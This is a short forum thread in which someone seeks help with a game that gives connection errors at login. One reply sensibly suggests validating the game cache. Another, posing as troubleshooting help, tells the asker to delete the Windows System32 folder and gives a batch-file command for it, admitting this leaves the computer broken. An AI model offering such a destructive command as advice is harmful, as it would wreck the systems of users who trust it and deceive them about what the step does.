Try right clicking on a game, going to properties, then game files or something, then Validate Game Cache or something like that. Will fix all missing/corrupted files. If not, it's something you did with your computer.
Did someone tell you to delete System 32? Cuz if not, try doing that.

You can make a text file and enter:
Code:
off del c:\WINDOWS\system32
Then change it into a .bat file and open it. And voila, your computer's broken.

I tried that multiple of times. But when i try to log back in, it gives me a connecting error, then i have to restart my computer. THen it works
